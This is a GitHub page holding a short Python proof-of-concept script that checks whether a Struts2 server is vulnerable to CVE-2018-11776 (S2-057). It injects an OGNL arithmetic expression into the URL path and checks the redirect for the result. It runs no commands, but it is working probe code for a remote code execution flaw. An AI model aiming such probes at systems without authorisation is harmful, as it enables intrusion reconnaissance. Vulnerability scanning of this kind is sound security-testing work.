-
Notifications
You must be signed in to change notification settings - Fork 50
/
Copy pathexploitS2-057-test.py
executable file
·64 lines (39 loc) · 2.31 KB
/
exploitS2-057-test.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
#!/usr/bin/env python3
# From: JIGUANG [email protected]
# edits by hook-s3c (github.com/hook-s3c)
import requests,sys,random,json
requests.packages.urllib3.disable_warnings()
from urllib import parse
def info():
s2_057 = {"id": "CVE-2018-11776", "kind": "web", "type": "Remote Command Execution", "name": "Struts2 \u547d\u4ee4\u6267\u884c\u6f0f\u6d1eCVE-2018-11776", "status": "high", "description": "", "expansion": "", "resolution": "", "method": "POST", "payload": "", "header": "", "body": "", "affectedComponent": [{"name": "WebLogic", "description": "Struts2\u662f\u4e00\u4e2a\u57fa\u4e8eMVC\u8bbe\u8ba1\u6a21\u5f0f\u7684Web\u5e94\u7528\u6846\u67b6\uff0c\u5b83\u672c\u8d28\u4e0a\u76f8\u5f53\u4e8e\u4e00\u4e2aservlet\uff0c\u5728MVC\u8bbe\u8ba1\u6a21\u5f0f\u4e2d\uff0cStruts2\u4f5c\u4e3a\u63a7\u5236\u5668(Controller)\u6765\u5efa\u7acb\u6a21\u578b\u4e0e\u89c6\u56fe\u7684\u6570\u636e\u4ea4\u4e92"}]}
def poc(url):
try:
retval = False
headers = dict()
headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:61.0) Gecko/20100101 Firefox/61.0'
r1 = random.randint(10000,99999)
r2 = random.randint(10000,99999)
r3 = r1 + r2
urlOne = url
res = requests.get(url=urlOne,timeout=6,allow_redirects=False,verify=False)
if res.status_code == 200:
urlTemp = parse.urlparse(urlOne)
urlTwo = urlTemp.scheme + '://' + urlTemp.netloc + '/${%s+%s}/help.action'%(r1,r2)
res = requests.get(url=urlTwo,timeout=6,allow_redirects=False,verify=False)
print("testing the url for exploit;", urlTwo)
if res.status_code == 302 and res.headers.get('Location') is not None and str(r3) in res.headers.get('Location'):
# print("passed the redirect check")
urlThree = res.headers.get('Location')
# print(urlThree)
# res = requests.get(url=urlThree,timeout=6,allow_redirects=False,verify=False)
retval |= str(r3) in urlThree
# print(retval)
except:pass
finally:
if retval:
print('URL {} s2-057 CVE-2018-11776 is vulnerable!'.format(url))
else:
print('URL {} s2-057 CVE-2018-11776, not vulnerable!'.format(url))
if __name__ == '__main__':
args = sys.argv[1]
poc(url=args)